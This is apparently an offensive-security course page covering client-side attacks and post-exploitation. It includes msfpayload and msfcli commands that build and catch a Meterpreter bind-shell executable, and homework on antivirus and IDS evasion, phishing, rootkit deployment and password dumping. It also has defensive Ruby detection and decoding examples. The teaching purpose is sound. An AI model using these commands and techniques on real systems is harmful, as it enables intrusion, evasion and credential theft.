Client-sides

In penetration testing, the targets for exploitation aren't always network services that are exposed through a firewall. When you need to find other ways in, your primary targets become the browser, office applications, audio and video players, and the user himself. Dean De Beer and Colin Ames are going to explain this attack methodology and how it's different from what you've learned so far.

Homework

You have three choices for your homework assignment in this section:

Option 1: Plugin Detection

  • Create a webpage that detects browser version, 3rd-party apps, class IDs, etc.
  • Consider cross-browser functionality
  • Deliver an exploit or a unique page based on the collected information

Option 2: Create and obfuscate MDAC RDS code

  • Try to bypass a network IDS, consider what the signatures are triggering on
  • Code sample available (check presentation, milw0rm, or ask Dean)

Option 3: Malicious PDF

  • Encode/obfuscate a malicious PDF to bypass AV on a host. Test the PDF against VirusTotal. The malicious PDF must remain functional (open calc.exe)
  • Code sample available (ask Dean)

Post-Exploitation

This is a really rough cut of Colin's Post-exploitation lecture. There is something wrong with the audio and friends are helping me work this out so that it's in a listenable state. I'm planning on taking another shot at it after Thanksgiving.

[homework coming soon]

Reference Material

Like the reversing section, there is simply too much reference material I wanted to include, so I've centralized it here for you.

Reading Material

Web Malware

Finding samples

Reversing it

Meterpreter Documentation

If the meterpreter API doesn't natively do what you want it to, try uploading and executing one of Nirsoft's utilities.

You don't have to exploit anything to get a Meterpreter instance running. You can bundle Meterpreter into an executable to double-click and run with the following msfpayload commands:

create payload:

  • ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter.exe

to listen for connections:

  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=4444 E
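A bind_tcp payload like the meterpreter.exe built above leaves one obvious footprint on the host: a new listening TCP socket (port 4444 in the commands above). The following is an added example, not part of the course material, showing how a defender can spot that from ordinary `netstat -an` output. The netstat sample and the list of expected listeners are constructed for the example.

```ruby
# Added example (not from the course page): flag unexpected listening TCP
# sockets in netstat-style output, the footprint a bind_tcp payload such as
# the meterpreter.exe above leaves on a host. All input is constructed.

# Ports this host is expected to listen on (an assumption for the example).
EXPECTED_LISTENERS = [135, 139, 445, 3389].freeze

# Constructed sample of "netstat -an" output from a Windows host.
SAMPLE_NETSTAT = <<~NETSTAT
  Active Connections

    Proto  Local Address          Foreign Address        State
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
    TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
    TCP    192.168.1.110:139      0.0.0.0:0              LISTENING
    TCP    192.168.1.110:49152    192.168.1.5:445        ESTABLISHED
    UDP    0.0.0.0:500            *:*
NETSTAT

# Parse netstat lines into hashes of {proto, addr, port, state}; header
# lines and anything else that does not start with TCP/UDP are skipped.
def parse_netstat(text)
  text.each_line.map do |line|
    m = line.match(/^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?/)
    next nil unless m
    { proto: m[1], addr: m[2], port: m[3].to_i, state: m[4] }
  end.compact
end

# Return the listening TCP sockets whose port is not on the expected list.
def unexpected_listeners(text, expected = EXPECTED_LISTENERS)
  parse_netstat(text)
    .select { |s| s[:proto] == 'TCP' && s[:state] == 'LISTENING' }
    .reject { |s| expected.include?(s[:port]) }
end

if __FILE__ == $PROGRAM_NAME
  unexpected_listeners(SAMPLE_NETSTAT).each do |s|
    puts "unexpected listener: #{s[:addr]}:#{s[:port]}"
  end
end
```

Run against real output, the same check works on the text of `netstat -an` from any host; the allowlist is the part you tune per machine role.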

Post-Exploitation 2008

Hopefully it should be clear from the Client-side section that you can get more shells than you know what to do with in a well-designed phishing campaign. This brings up some interesting problems in that you can't sit around and interact with each shell anymore, you need to automate what you want to extract or abuse from each host. Dean De Beer is back to talk about this problem in today's lecture.

Homework

Your homework is to write a meterpreter script that automates some post-exploitation activity you think you would need to perform. Choose one of my ideas below or come up with your own!

  • Configure and upload the FU or FUTO rootkit
  • Pull out passwords from .vbs scripts on the PATH
  • Set the victim's wallpaper and sound
  • A VNC password decoder
  • A WEP password dumper
  • Whatever else you want...
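The "pull out passwords from .vbs scripts" idea has a direct defensive counterpart: auditing a host's scripts for hardcoded credentials before an automated post-exploitation script does it for you. The following is an added example, not code from the course or from Metasploit. It is plain Ruby rather than a Meterpreter script, the three sample scripts are constructed and written to a temporary directory, and the credential patterns are assumptions chosen for the example.

```ruby
# Added example (not from the course): audit a directory of VBScript files
# for lines that assign a literal value to a credential-looking variable or
# carry a Password= pair in a connection string. Sample scripts are
# constructed for the example.
require 'tmpdir'
require 'find'

# Credential-style assignment patterns (assumptions for this example).
CREDENTIAL_PATTERNS = [
  /^\s*(?:Const\s+|Dim\s+)?\w*(?:pass|pwd|secret)\w*\s*=\s*"([^"]+)"/i,
  /Password\s*=\s*([^;"']+)/i
].freeze

# Constructed sample scripts: the first two leak a credential, the third does not.
SAMPLE_SCRIPTS = {
  'backup.vbs' => %(Dim strPassword\nstrPassword = "Summer2008!"\nWScript.Echo "backup"\n),
  'db.vbs'     => %(conn.Open "Provider=SQLOLEDB;Data Source=db1;User ID=sa;Password=s3cret;"\n),
  'clean.vbs'  => %(Dim name\nname = InputBox("Name?")\nWScript.Echo name\n)
}.freeze

# Walk root and return [{file:, line:, match:}] for every credential-looking
# line found in files with the given extension (one finding per line).
def find_hardcoded_credentials(root, ext = '.vbs')
  findings = []
  Find.find(root) do |path|
    next unless File.file?(path) && File.extname(path).casecmp?(ext)
    File.foreach(path).with_index(1) do |line, no|
      CREDENTIAL_PATTERNS.each do |re|
        if (m = re.match(line))
          findings << { file: File.basename(path), line: no, match: m[1] }
          break
        end
      end
    end
  end
  findings
end

# Write the constructed scripts to a temp dir, scan it, and return the findings.
def scan_sample_scripts
  Dir.mktmpdir('vbs-audit') do |dir|
    SAMPLE_SCRIPTS.each { |name, body| File.write(File.join(dir, name), body) }
    find_hardcoded_credentials(dir)
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_sample_scripts.each { |f| puts "#{f[:file]}:#{f[:line]} -> #{f[:match]}" }
end
```

Point `find_hardcoded_credentials` at a real scripts directory (or the directories on PATH) to get the same report; every hit is a credential that should move out of the script into a protected store.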

Client-sides 2008

Homework

You have two choices for your homework assignment in this section:

Option 1: Run a Phishing Campaign

  • 1a. Intelligence Gathering
    • Find all e-mail addresses for poly.edu
    • Find any other domains, URLs, or other info that can be used to improve a phish's success
    • Describe methods, tools and scripts used for this step
  • 1b. Target phishfood@###.com
    • Develop an e-mail (create a scenario) and link it to malicious site that you create
    • At your landing page, gather the following info: remote IP, plugins, browser, etc...
    • If possible, drop and execute a file on the target

Option 2: Analyze a web-based malware sample

  • Decode the JS and describe its obfuscation techniques
  • Describe what it does, what bug it exploits, how, etc...
  • Modify the code [payload] to use your own payload.exe
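Decoding the JavaScript is the first step of Option 2, and two encodings come up constantly in web malware: `unescape("%XX...")` strings and `String.fromCharCode(n, n, ...)` calls. The following is an added example, not part of the course or any analyzed sample: a small static decoder that rewrites both forms into plain string literals, then lists which suspicious constructs the text contains before and after decoding. The obfuscated snippet is constructed for the example and the hostname in it is a placeholder.

```ruby
# Added example (not from the course): static decoding of two common
# obfuscation encodings in web malware, plus a before/after indicator scan.
# The sample snippet is constructed; PLACEHOLDER-HOST is not a real host.

# Constructed sample: "document.write" hidden in unescape(), "<iframe" hidden
# in String.fromCharCode(), assembled and run through eval().
SAMPLE_JS = <<~JS
  var a = unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65");
  var b = String.fromCharCode(60,105,102,114,97,109,101);
  eval(a + "('" + b + " src=http://PLACEHOLDER-HOST/x.htm width=0 height=0>')");
JS

# Replace unescape("%XX%XX...") with the decoded string literal.
def decode_unescape(js)
  js.gsub(/unescape\("((?:%[0-9A-Fa-f]{2})+)"\)/) do
    bytes = Regexp.last_match(1).scan(/%([0-9A-Fa-f]{2})/).flatten
    '"' + bytes.map { |h| h.hex.chr }.join + '"'
  end
end

# Replace String.fromCharCode(n, n, ...) with the decoded string literal.
def decode_fromcharcode(js)
  js.gsub(/String\.fromCharCode\(([\d,\s]+)\)/) do
    chars = Regexp.last_match(1).split(',').map { |n| n.strip.to_i.chr }
    '"' + chars.join + '"'
  end
end

# Apply both decoders; each pass is independent so order does not matter here.
def deobfuscate(js)
  decode_fromcharcode(decode_unescape(js))
end

# Constructs worth noting in an analysis write-up (assumed list for the example).
INDICATORS = %w[eval document.write iframe unescape fromCharCode].freeze

# Return the indicators present in the given text, in INDICATORS order.
def indicators(js)
  INDICATORS.select { |i| js.include?(i) }
end

if __FILE__ == $PROGRAM_NAME
  decoded = deobfuscate(SAMPLE_JS)
  puts decoded
  puts "before: #{indicators(SAMPLE_JS).join(', ')}"
  puts "after:  #{indicators(decoded).join(', ')}"
end
```

Real samples usually nest several layers (the decoded text is itself passed to eval again), so in practice you run `deobfuscate` repeatedly until the indicator list stops changing and then read the final layer by hand.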